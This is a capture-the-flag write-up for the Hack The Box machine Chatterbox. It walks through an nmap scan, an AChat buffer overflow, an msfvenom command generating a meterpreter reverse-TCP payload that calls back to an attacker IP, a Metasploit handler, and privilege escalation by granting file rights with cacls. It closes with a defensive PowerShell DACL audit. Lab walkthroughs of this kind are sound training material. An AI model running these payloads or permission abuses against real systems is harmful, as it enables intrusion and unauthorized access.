This is a write-up for the recently retired Chatterbox machine on the Hack The Box platform. If you don’t already know, Hack The Box is a website where you can further your cyber security knowledge by hacking into a range of different machines.

TL;DR: Abusing CACLS.

For some strange reason, it took me far longer to recreate my steps in order to write this up than it did to complete the box the first time round. I found this system particularly infuriating due to its constant resets and crashes, but despite this, I feel like I’ve still learnt a lot from it.

As always, we start with an nmap scan. Unfortunately, this revealed nothing, even when forcing all ports. I later tried Zenmap (which is essentially just nmap with a GUI), which managed to return some results:

As we can see, Zenmap used the following command to perform the scan:

nmap -p 1-65535 -T4 -A -v -Pn 10.10.10.74

Let’s run down the syntax here:

-p 1-65535 : This simply specifies the port range (all TCP ports).

-T4 : This sets the timing template to 4/5.

-A : This enables additional advanced and aggressive scan options.

-Pn : This disables the regular ping discovery stage.

Since I couldn’t connect to the AChat system through my browser or netcat, I instead went straight to searching for AChat-related exploits:

Nearly all of the results on the first page referenced the same buffer overflow exploit.

Okay, looks like we’ve got one.

The Exploit-DB page comes with a Python script that performs the exploit; the shellcode it sends is generated beforehand with msfvenom and then executed on the target.

In the script, the following command is used to generate the payload:

msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python

However, this would simply pop calc.exe rather than give us a reverse shell (which is what we want). It’s also interesting to note how many bad characters there are: every byte from \x80 to \xff, plus the null byte, is excluded.

As such, to obtain a reverse shell, we need to change the msfvenom command, to fit our goal:

msfvenom --platform Windows -p windows/meterpreter/reverse_tcp LHOST=10.10.15.102 LPORT=1337 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python

Running this gives us the correct shellcode, which we can paste into the original Python script in place of the calc.exe payload.

We can then set up a Metasploit handler to listen for the connection as shown (as I learnt from here):

We can then make the session automigrate (just to ensure persistence) with the following command:

Although this isn’t always useful, it is mandatory for this box, as I later discovered that without it the connection was consistently cut within 3 seconds.

After this has been correctly configured, we can finally run the exploit:

From here, we could navigate to the user’s desktop and obtain their flag.

Since neither the regular Metasploit Windows enumeration module nor Pentestmonkey’s Windows privilege escalation checker (found here) found anything of interest, I instead looked at the Administrator’s flag file itself, as Windows “root” flags are always in the Administrator’s Desktop folder.

After some time investigating it, it turned out that we could simply change the file’s permissions with CACLS (not ICACLS), which Wikipedia describes as a “Microsoft Windows native command line utility capable of displaying and modifying the security descriptors on folders and files”. Thus, by running “cacls root.txt /grant Alfred:F”, we can give ourselves permission (as our user was called Alfred).

Now, we can read it with “type”, and obtain the admin flag.
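From a defender’s angle, the weakness here is that a low-privileged user holds a right on a file in the Administrator’s profile that lets them rewrite its DACL, so a permission grant like the one above succeeds. The following PowerShell audit is an added example and not part of the original write-up or the box; the flag path and the trusted-principal list are constructed assumptions, and it reports any non-trusted owner or any Allow ACE carrying ChangePermissions, TakeOwnership or FullControl.

```powershell
# Added example: audit who can rewrite the DACL of sensitive files.
# The default path and trusted-principal list are constructed for this demo.
param(
    [string[]]$Paths = @('C:\Users\Administrator\Desktop\root.txt'),
    # Principals expected to hold DACL-changing rights on these files.
    [string[]]$Trusted = @('BUILTIN\Administrators', 'NT AUTHORITY\SYSTEM', 'CREATOR OWNER')
)

# WRITE_DAC and WRITE_OWNER; FullControl contains both bits, so it is caught too.
$Dangerous = [int]([System.Security.AccessControl.FileSystemRights]::ChangePermissions -bor
                   [System.Security.AccessControl.FileSystemRights]::TakeOwnership)
$GenericAll = 0x10000000  # unmapped GENERIC_ALL bit, equivalent to Full Control

function Test-DaclExposure {
    param([string]$Path)
    $findings = @()
    $acl = Get-Acl -LiteralPath $Path

    # The owner can always rewrite the DACL, whatever the explicit ACEs say.
    if ($Trusted -notcontains $acl.Owner) {
        $findings += "$Path is owned by $($acl.Owner), who can rewrite its DACL"
    }

    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($Trusted -contains $ace.IdentityReference.Value) { continue }
        $rights = [int]$ace.FileSystemRights
        if ((($rights -band $Dangerous) -ne 0) -or (($rights -band $GenericAll) -ne 0)) {
            $origin = if ($ace.IsInherited) { 'inherited' } else { 'explicit' }
            $findings += "$Path grants $($ace.FileSystemRights) to $($ace.IdentityReference) ($origin ACE)"
        }
    }
    return $findings
}

$results = foreach ($p in $Paths) {
    if (Test-Path -LiteralPath $p) { Test-DaclExposure -Path $p }
    else { Write-Verbose "Skipping missing path $p" }
}

if ($results) { $results | ForEach-Object { Write-Warning $_ } }
else { Write-Output 'No DACL-changing rights held outside the trusted principals.' }
```

Inherited ACEs point at the parent folder’s DACL rather than the file, so a finding marked “inherited” is fixed on the directory, not by editing the file alone.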

And with that, the box has been completed.